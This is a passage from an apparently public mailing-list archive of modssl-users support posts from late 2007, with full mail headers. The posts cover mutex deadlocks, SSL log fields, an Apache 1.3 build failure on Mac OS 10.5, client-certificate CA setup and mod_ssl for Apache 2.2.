ssl_mutex with apache 1.3 Date: Thu, 29 Nov 2007 21:04:39 -0800 Message-ID: <4465623F8C892B4C829F7B4D09A4C2B90454FCC1@xmb-sjc-234.amer.cisco.com> X-MS-Has-Attach: yes X-MS-TNEF-Correlator: Thread-Topic: ssl_mutex with apache 1.3 Thread-Index: Acgy9dhk44dCzyC0TDyFiCU+8wK6UQAGJ09A From: "Naveen Tyagi (ntyagi)" To: X-OriginalArrivalTime: 30 Nov 2007 05:05:06.0129 (UTC) FILETIME=[928C5C10:01C8330E] DKIM-Signature: v=0.5; a=rsa-sha256; q=dns/txt; l=6005; t=1196399112; x=1197263112; c=relaxed/simple; s=sjdkim4002; h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version; d=cisco.com; i=ntyagi@cisco.com; z=From:=20=22Naveen=20Tyagi=20(ntyagi)=22=20 |Subject:=20=20ssl_mutex=20with=20apache=201.3 |Sender:=20; bh=ZLOm25/P6dBwCS7PVR2VMKuwHEfo/ayKeCn8ceeeHSo=; b=fW/m3r0u9eP4Sqmhl+/j1M5Rv+xTkfsbHzTKE0XboY5obmSwBpr04wf11RbNln9gZTX9SZww Q6CaQU9tsZpEg+gMVVDLH5l2r2DVDPA0dE+w2V1wwD8H1ZUFDdPHPHxz; Authentication-Results: sj-dkim-4; header.From=ntyagi@cisco.com; dkim=pass ( sig from cisco.com/sjdkim4002 verified; ); Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Naveen Tyagi (ntyagi)" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multi-part message in MIME format. ------_=_NextPart_001_01C8330E.927EEA58 Content-Type: multipart/alternative; boundary="----_=_NextPart_002_01C8330E.927EEA58" ------_=_NextPart_002_01C8330E.927EEA58 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable =20 Hi, I am using mod_ssl with apache 1.3. I notice that due mod_ssl ssl_mutex files are created at the location (I specified in httpd.conf). One of apache modules (mod_auth_tacacs) calls someof my application code. This code has file based locking . My question is that due to this setup: ssl_mutex and file locks in application code ,is it likely that there could be deadlock situation among different=20 instances of childern httpd processes .=20 Thanks for your help. Naveen. ------_=_NextPart_002_01C8330E.927EEA58 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable


 
Hi,
 I am using = mod_ssl with=20 apache 1.3. I notice that due mod_ssl ssl_mutex files are created at the = location (I specified in httpd.conf).
 One of apache = modules=20 (mod_auth_tacacs) calls someof my application code. This code has file = based=20 locking .
 My = question is=20 that due to this setup: ssl_mutex and file locks in application code ,is = it=20 likely that there could be deadlock situation among different=20
 instances=20 of  childern httpd processes  .
  Thanks for = your=20 help.
 =20 Naveen.
------_=_NextPart_002_01C8330E.927EEA58-- ------_=_NextPart_001_01C8330E.927EEA58 Content-Type: image/gif; name="tech.gif" Content-Transfer-Encoding: base64 Content-ID: <656170405@30112007-0135> Content-Description: tech.gif Content-Location: tech.gif R0lGODlhFAAUAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Z mf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8A Zv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZ M8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wA AJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm /5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/ zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZm mWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNm MzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/ AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz /wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAFAAUAEAIQwBJCBxI sKBBAAgTKlyYUCDDhwsdQpwoceLDihYjksh4cSNHjR9BhmzocSQAjCFRflTJkWVGlxZhUiw5UiZE gzhzBgQAOw== ------_=_NextPart_001_01C8330E.927EEA58-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Dec 6 20:26:53 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 76E3A14DA45; Thu, 6 Dec 2007 20:26:53 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.177]) by master.modssl.org (Postfix) with ESMTP id 0275B14D84F for ; Thu, 6 Dec 2007 20:26:52 +0100 (CET) Received: by py-out-1112.google.com with SMTP id a25so784235pyi for ; Thu, 06 Dec 2007 11:26:42 -0800 (PST) Received: by 10.64.91.15 with SMTP id o15mr4646646qbb.1196969201605; Thu, 06 Dec 2007 11:26:41 -0800 (PST) Received: by 10.65.158.4 with HTTP; Thu, 6 Dec 2007 11:26:41 -0800 (PST) Message-ID: <4a49209a0712061126o18adfc15n2b6d38318a90156f@mail.gmail.com> Date: Thu, 6 Dec 2007 14:26:41 -0500 From: "Shiva Subramanian" To: modssl-users@modssl.org Subject: %{SSL_PROTOCOL}x %{SSL_CIPHER}x - question MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Shiva Subramanian" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users hi there, recently I turned on the SSL_PROTOCOL & SSL_CIPHER on one of our web server to gather some statistics on the SSL protocol & ciphers being used. most of the entries have SSLv3, TLSv1, some SSLv2s here and there and then there are these entries with only a "-" & "-" in place where the SSL_PROTOCOL & SSL_CIPHER should be. for eg: XX.XX.83.98 - - [XX/XX/2007:13:31:27 -0500] SSLv3 RC4-MD5 "GET XX HTTP/1.0" 404 363 "XX" "XX" XX.XX.83.98 - - [XX/XX/2007:13:31:51 -0500] - - "GET /" 400 596 "-" "-" XX.XX.83.98 - - [XX/XX/2007:13:32:21 -0500] - - "GET /" 400 596 "-" "-" my question is what does the "-" & "-" represent in the SSL_PROTOCOL & SSL_CIPHER fields respectively. I searched the posting archives, the FAQs & a look at the documentation, but am not able to find anything related. any help or information would be much appreciated. thanks, - Shiva ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Dec 10 00:04:37 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 2926B14DA63; Mon, 10 Dec 2007 00:04:37 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.191]) by master.modssl.org (Postfix) with ESMTP id 06FE614DA30 for ; Mon, 10 Dec 2007 00:04:35 +0100 (CET) Received: by rv-out-0910.google.com with SMTP id k20so1394855rvb for ; Sun, 09 Dec 2007 15:04:24 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to:content-type:content-transfer-encoding:mime-version:subject:date:x-mailer:sender; bh=eZ9Z24x/mAZslPnVRvUb5FrYVucTcgN4+o8cTNU0o7w=; b=dKwjv3qsJ+ri8dl+jQFmOWubgApwRrIPNd9ZyiqTxbF+YZVSHjp1sQnIbty2K0wz3pd5Bvr4CSfWwHDJnTKgYu/cVrdBgkR+0xw/lc9n8pCc9kGCrAblPzoYNXGtqGxbmmXKey3JYP+uw5WIti+INvxVQ39QDMjiVZCCyGk2A9g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:content-type:content-transfer-encoding:mime-version:subject:date:x-mailer:sender; b=KnDBGITDAy43JRUw+nuQhT/I72xPDWCzSt8aLVtZCI3UVIkYW1aSJk32JQLo39C5YnscirBfBK8OZriA3RT6iGbscKC9cng64SxYIhL+Ct3V+QHTzzLcR18RosP7x66xXwVvBUaPvgX197A2J2YGwvv45abkLOf4WYn7buD9eQk= Received: by 10.140.180.13 with SMTP id c13mr3885630rvf.1197241464783; Sun, 09 Dec 2007 15:04:24 -0800 (PST) Received: from ?192.168.1.100? ( [69.181.199.211]) by mx.google.com with ESMTPS id g1sm5111561rvb.2007.12.09.15.04.24 (version=TLSv1/SSLv3 cipher=OTHER); Sun, 09 Dec 2007 15:04:24 -0800 (PST) Message-Id: From: Jacob Weber To: modssl-users@modssl.org Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v915) Subject: Compiling Apache with mod_ssl on Mac OS 10.5 Date: Sun, 9 Dec 2007 15:04:23 -0800 X-Mailer: Apple Mail (2.915) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jacob Weber X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Hello. I'm having trouble compiling Apache with mod_ssl, on an MacBook Pro running Mac OS 10.5.1. I'm trying to build the following programs (rather than using the ones that come with the OS): openssl-0.9.8g mm-1.4.1 mod_ssl-2.8.30-1.3.39 apache_1.3.39 Everything works until I try to make Apache. I get the message "ld: warning in ./libhttpd.so, file is not of required architecture", and then it exits due to some undefined symbols. If I look at "file src/ libhttpd.so", it gives me "Mach-O bundle i386", which looks correct. Anyone know why this would happen? More details are below. If I don't pass --enable-module=ssl --enable-rule=SHARED_CORE when configuring Apache, I don't get this error, so I assume it's somewhat related to mod_ssl. Jacob The end of the "make" output looks like this: <=== src/modules gcc -c -I./../../mm-1.4.1 -I./os/unix -I./include -DDARWIN - DMOD_SSL=208130 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DSHARED_CORE `./ apaci` modules.c gcc -c -I./../../mm-1.4.1 -I./os/unix -I./include -DDARWIN - DMOD_SSL=208130 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DSHARED_CORE `./ apaci` buildmark.c cc -bundle -undefined suppress -flat_namespace -o libhttpd.so buildmark.o modules.o modules/ssl/libssl.a modules/standard/ libstandard.a main/libmain.a ./os/unix/libos.a ap/libap.a regex/ libregex.a gcc -I./../../mm-1.4.1 -I./os/unix -I./include -DDARWIN - DMOD_SSL=208130 -DUSE_HSREGEX -DEAPI -DEAPI_MM -DSHARED_CORE `./ apaci` -L$BUILD_DIR/openssl-0.9.8g -L./../../mm-1.4.1/.libs \ -o libhttpd.ep -DSHARED_CORE_TIESTATIC main/http_main.c \ -L. -lhttpd -ldbm -lssl -lcrypto -lmm -lexpat ld: warning in ./libhttpd.so, file is not of required architecture Undefined symbols: "_ap_validate_password", referenced from: _suck_in_ap_validate_password in ccRuUDHX.o "_ap_main", referenced from: _main in ccRuUDHX.o ld: symbol(s) not found collect2: ld returned 1 exit status make[2]: *** [libhttpd.ep] Error 1 make[1]: *** [build-std] Error 2 make: *** [build] Error 2 I'm running the following commands (with $TAR_DIR, $BUILD_DIR, and $INSTALL_DIR defined): cd $BUILD_DIR tar xzvf $TAR_DIR/openssl-0.9.8g.tar.gz cd $BUILD_DIR/openssl-0.9.8g ./config --prefix=$INSTALL_DIR --openssldir=$INSTALL_DIR/openssl make cd $BUILD_DIR tar xzvf $TAR_DIR/mm-1.4.1.tar.gz cd $BUILD_DIR/mm-1.4.1 ./configure --disable-shared make cd $BUILD_DIR tar xzvf $TAR_DIR/apache_1.3.39.tar.gz tar xzvf $TAR_DIR/mod_ssl-2.8.30-1.3.39.tar.gz cd $BUILD_DIR/mod_ssl-2.8.30-1.3.39 ./configure --with-apache=../apache_1.3.39 --with-ssl=../ openssl-0.9.8g --prefix=$INSTALL_DIR cd $BUILD_DIR/apache_1.3.39 export SSL_BASE=../openssl-0.9.8g export EAPI_MM=../mm-1.4.1 ./configure --enable-module=ssl --enable-module=headers --enable- module=expires --enable-module=so --enable-module=rewrite --enable- rule=SHARED_CORE --prefix=$INSTALL_DIR make # the error happens here ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 11:42:30 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id A3B0214DA41; Fri, 14 Dec 2007 11:42:30 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.185]) by master.modssl.org (Postfix) with ESMTP id 2C95E14D83F for ; Fri, 14 Dec 2007 11:42:28 +0100 (CET) Received: by rv-out-0910.google.com with SMTP id k20so899299rvb.1 for ; Fri, 14 Dec 2007 02:42:16 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=iTeLeSUSuWLgBjAxcuO5kPHQa8ymFv5+QcexDbf1A3U=; b=wkpIzGX5ZsiyTWT+uIH2HcfkJPDlRrahFYeH7kiEcSZqgiVy2Ys7qtmTNsHfXram7PP7OaG3qVy4rdeynka8wvHjXaecXqww1dctRtqkNt8V25Jlr6KgF2Ams8SlRI9R6llf2Z2SrXEtPfiPTrrKZZi/JB6WEIRQWKXAr4U66Ek= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=ERkqA0GQwurEL2mtM5e38x1DkAKsmJSRJzGcGliV0wB55ELkGgpXIBwC6ILYbS//bGj3sSJE8lCT/We6OMVQkV+1+RzaETvw1Muo99iJ2UywWIcqsIMyAd2j5ZLMhwhFdaVOAPq9r1boxfhMXbRS5fpaLL42ET1v7Zgou8oc1qw= Received: by 10.140.180.13 with SMTP id c13mr1760348rvf.121.1197628936783; Fri, 14 Dec 2007 02:42:16 -0800 (PST) Received: by 10.141.161.18 with HTTP; Fri, 14 Dec 2007 02:42:16 -0800 (PST) Message-ID: Date: Fri, 14 Dec 2007 10:42:16 +0000 From: "Anony Mouse" To: modssl-users@modssl.org Subject: Re: %{SSL_PROTOCOL}x %{SSL_CIPHER}x - question In-Reply-To: <4a49209a0712061126o18adfc15n2b6d38318a90156f@mail.gmail.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_345_31530439.1197628936747" References: <4a49209a0712061126o18adfc15n2b6d38318a90156f@mail.gmail.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Anony Mouse" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_345_31530439.1197628936747 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline On Dec 6, 2007 7:26 PM, Shiva Subramanian wrote: > hi there, > > recently I turned on the SSL_PROTOCOL & SSL_CIPHER on one of our > web server to gather some statistics on the SSL protocol & ciphers > being used. > > most of the entries have SSLv3, TLSv1, some SSLv2s here and there > and then there are these entries with only a "-" & "-" in place where > the SSL_PROTOCOL & SSL_CIPHER should be. > > for eg: > > XX.XX.83.98 - - [XX/XX/2007:13:31:27 -0500] SSLv3 RC4-MD5 "GET XX > HTTP/1.0" 404 363 "XX" "XX" > XX.XX.83.98 - - [XX/XX/2007:13:31:51 -0500] - - "GET /" 400 596 "-" "-" > XX.XX.83.98 - - [XX/XX/2007:13:32:21 -0500] - - "GET /" 400 596 "-" "-" > > my question is what does the "-" & "-" represent in the > SSL_PROTOCOL & SSL_CIPHER fields respectively. > The hypen just represents a null variable. In this case, no SSL session was present. The request in the above example returned status code 400 for Bad Request. You can reproduce it by issuing a plain HTTP "GET /" to an HTTPS host. Regards, ------=_Part_345_31530439.1197628936747 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline On Dec 6, 2007 7:26 PM, Shiva Subramanian <shiva@subbu.us> wrote:
hi there,

  recently I turned on the SSL_PROTOCOL & SSL_CIPHER on one of our
web server to gather some statistics on the SSL protocol & ciphers
being used.

  most of the entries have SSLv3, TLSv1, some SSLv2s here and there
and then there are these entries with only a "-" & "-" in place where
the SSL_PROTOCOL & SSL_CIPHER should be.

for eg:

XX.XX.83.98 - - [XX/XX/2007:13:31:27 -0500] SSLv3 RC4-MD5  "GET XX
HTTP/1.0" 404 363 "XX" "XX"
XX.XX.83.98 - - [XX/XX/2007:13:31:51 -0500] - -  "GET /" 400 596 "-" "-"
XX.XX.83.98 - - [XX/XX/2007:13:32:21 -0500] - -  "GET /" 400 596 "-" "-"

  my question is what does the "-" & "-" represent in the
SSL_PROTOCOL & SSL_CIPHER fields respectively.

The hypen just represents a null variable. In this case, no SSL session was present.

The request in the above example returned status code 400 for Bad Request. You can reproduce it by issuing a plain HTTP "GET /" to an HTTPS host.

Regards,
------=_Part_345_31530439.1197628936747-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 11:44:10 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 8276C14DA4E; Fri, 14 Dec 2007 11:44:10 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from rv-out-0910.google.com (rv-out-0910.google.com [209.85.198.191]) by master.modssl.org (Postfix) with ESMTP id E5AC814DA40 for ; Fri, 14 Dec 2007 11:44:09 +0100 (CET) Received: by rv-out-0910.google.com with SMTP id k20so899749rvb.1 for ; Fri, 14 Dec 2007 02:43:57 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlemail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=Ox0VxDCfpxdp0Zepl0MMR3jhNNIUiZgaDEYo7mdfc6E=; b=dugmLRZq+vhBq8jhT5YLd+C2mJjNPX9HUn1euBtCb3iY5K2V+KOAsaWZV/KNuUgEmhYrXrfUf8InCppth3X3XQ6Qm7yNtQ7olQuzlIBSdN6v6vnsQmbBi+wvKGPPdCrmlzYDuE2hX8Wrr+4d4HCJIwQ1Ge/LDycMxeiVRufwWFw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Vx68vsiBPwzSgSD6/nin+hh5TJ2GJqrxBTYEXlvQ20rk7ArUvA/7mp++nQIPtr51a3V0t4aXoQDq3GWO/xdRDAAawf3tcYNcE/IF/SVU5mtvsnXP3uEy5dQ/4MbNioo9hZwvDxr0D2mij3PrLuBnorrVYojupGbBpkp6kCzsMyo= Received: by 10.141.122.20 with SMTP id z20mr1746344rvm.239.1197629037914; Fri, 14 Dec 2007 02:43:57 -0800 (PST) Received: by 10.141.161.18 with HTTP; Fri, 14 Dec 2007 02:43:57 -0800 (PST) Message-ID: Date: Fri, 14 Dec 2007 10:43:57 +0000 From: "Anony Mouse" To: modssl-users@modssl.org Subject: Re: Correct use of SSLVerifyClient and Sub-Ordinate CAs In-Reply-To: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_347_2769900.1197629037888" References: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Anony Mouse" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_347_2769900.1197629037888 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline On Nov 19, 2007 9:24 AM, Anony Mouse wrote: > I see that there's been the addition of the SSLCADNRequestFile > directive in Apache 2.2.x, but I don't see how this relates to this > particular problem. I also understand that I could narrow the problem > by using SSLRequire directives and the %{SSL_CLIENT_I_DN} variable, > but this seems a hackish solution to something that should be handled > by SSLCACertificateFile alone. Is this a bug? > > Any advice is appreciated. I can provide further details about my > Apache configs or logs if required. Nobody? Regards, ------=_Part_347_2769900.1197629037888 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline On Nov 19, 2007 9:24 AM, Anony Mouse <anonymouse23@googlemail.com> wrote:
I see that there's been the addition of the SSLCADNRequestFile
directive in Apache 2.2.x, but I don't see how this relates to this
particular problem. I also understand that I could narrow the problem
by using SSLRequire directives and the %{SSL_CLIENT_I_DN} variable,
but this seems a hackish solution to something that should be handled
by SSLCACertificateFile alone. Is this a bug?

Any advice is appreciated. I can provide further details about my
Apache configs or logs if required.

Nobody?

Regards,

------=_Part_347_2769900.1197629037888-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 12:10:19 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 08A8B14DA42; Fri, 14 Dec 2007 12:10:19 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31]) by master.modssl.org (Postfix) with ESMTP id 8BEFB14D83F for ; Fri, 14 Dec 2007 12:10:17 +0100 (CET) Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254]) by mx1.redhat.com (8.13.8/8.13.1) with ESMTP id lBEBA4ED014794; Fri, 14 Dec 2007 06:10:04 -0500 Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX19PmMoYFJfFiRNP3d3TWWFpU3tQavfImXc@vpn-14-17.rdu.redhat.com [10.11.14.17]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id lBEBA3Cw015292; Fri, 14 Dec 2007 06:10:04 -0500 Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68) (envelope-from ) id 1J38Qd-0003ZK-6U; Fri, 14 Dec 2007 11:10:03 +0000 Date: Fri, 14 Dec 2007 11:10:03 +0000 From: Joe Orton To: Anony Mouse Cc: modssl-users@modssl.org Subject: Re: Correct use of SSLVerifyClient and Sub-Ordinate CAs Message-ID: <20071214111003.GA13676@redhat.com> Mail-Followup-To: Anony Mouse , modssl-users@modssl.org References: MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.17 (2007-11-01) Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom. Registered in UK and Wales under Company Registration No. 03798903 Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Orton X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Mon, Nov 19, 2007 at 09:24:09AM +0000, Anony Mouse wrote: > I've found myself in the same quandary as this guy [1]. My CA > structure is as follows. > > - RootCA > - SubCA1 > - SubCA1 Server > - SubCA1 Clients > - SubCA2 > - SubCA2 Server > - SubCA2 Clients > > I have two HTTPS vhost containers. One which has a server certificate > issued by SubCA1 and should only accept client certificates from > SubCA1. Likewise, another for SubCA2, which should only accept client > certificates from SubCA2. I think this should work by using: SSLCertificateChainFile rootca SSLCACertificateFile SubCA1 SSLCACertificateFile SubCA2 joe ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 21:10:37 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id EF83414D9E6; Fri, 14 Dec 2007 21:10:36 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.182]) by master.modssl.org (Postfix) with ESMTP id 483E414D83F for ; Fri, 14 Dec 2007 21:10:35 +0100 (CET) Received: by py-out-1112.google.com with SMTP id a25so2910618pyi.11 for ; Fri, 14 Dec 2007 12:10:18 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; bh=hFYE3GdeQBbqPoArGu5tXkIjaovma/dEgPG568kLOno=; b=ekSG5njfOvenU6CMjFhoUNFuFNPS2Hjpoq9mE23PUmcV6IQRbHyOZnDN/rAky3q0MxKC2ohvn1xuxi1LNP6X4cgYveN7kC5BpWGN9UpWW2YPDTQmJE4O+PwT41NdA1VxJmHfNN37bYRDohx2ewIADgK/tEHU14k7xqZiglgrrks= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type; b=JVZztuR6rkgyLymY3TaPd4SkilvKsYbbKLyiIA2DsV7u3YU8wqaD+bc9pDaGhE70mfVsees1xqBoYtPmPzpt1LKtD9Y0BrzjZSNf/SgeW6UWB3ZTlF6kvaJ3zi8+BeV78mGb0aO1PwhojFub4UTbdS78RD7N09sZnu0U4r1mgzI= Received: by 10.64.142.10 with SMTP id p10mr8022077qbd.21.1197663017792; Fri, 14 Dec 2007 12:10:17 -0800 (PST) Received: by 10.65.122.1 with HTTP; Fri, 14 Dec 2007 12:10:17 -0800 (PST) Message-ID: <33b00e670712141210w5a373191i32b768f5967702ae@mail.gmail.com> Date: Fri, 14 Dec 2007 14:10:17 -0600 From: "Chris Jordan" To: "modssl-users@modssl.org" Subject: mod_ssl not for apache 2.2.4 (unix)? MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_2709_15614957.1197663017795" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chris Jordan" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users ------=_Part_2709_15614957.1197663017795 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi folks, I'm a complete newbie to compiling apache, and I'm trying to install my first SSL certificate. All instructions I can find so far all assume that I have mod_ssl installed already. I'm willing to install it, but all of the references I can find to the latest and greatest version of mod_ssl say that it's for apache 1.3.39, but I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6) I don't want to proceed with recompiling the web server unless I know that I'm doing the right thing. Can any one either a) just help me... or b) point me to a good article or set of articles on how to do this? I should mention that we host many, many virtual domains off this one server. Thanks heaps, Chris -- http://cjordan.us ------=_Part_2709_15614957.1197663017795 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi folks,

I'm a complete newbie to compiling apache, and I'm trying to install my first SSL certificate. All instructions I can find so far all assume that I have mod_ssl installed already.

I'm willing to install it, but all of the references I can find to the latest and greatest version of mod_ssl say that it's for apache 1.3.39, but I'm running apache 2.2.4 on a Fadora Core 6 (2.6.20-1.292.fc6)

I don't want to proceed with recompiling the web server unless I know that I'm doing the right thing.

Can any one either a) just help me... or b) point me to a good article or set of articles on how to do this?

I should mention that we host many, many virtual domains off this one server.

Thanks heaps,
Chris

--
http://cjordan.us ------=_Part_2709_15614957.1197663017795-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Dec 14 21:25:39 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 86C0A14D9E6; Fri, 14 Dec 2007 21:25:39 +0100 (CET) Delivered-To: modssl-users@modssl.org Received: from hq-ipt01.anteon.com (hq-ipt01.anteon.com [198.185.182.20]) by master.modssl.org (Postfix) with ESMTP id D233214D83F for ; Fri, 14 Dec 2007 21:25:37 +0100 (CET) Received: from hq-exout01.anteon.com ([10.170.1.216]) by hq-ipt01.anteon.com with ESMTP; 14 Dec 2007 15:25:26 -0500 X-SENDER-IP: 10.170.1.216 X-SENDER-REPUTATION: None X-IronPort-AV: i="4.24,169,1196658000"; d="scan'208"; 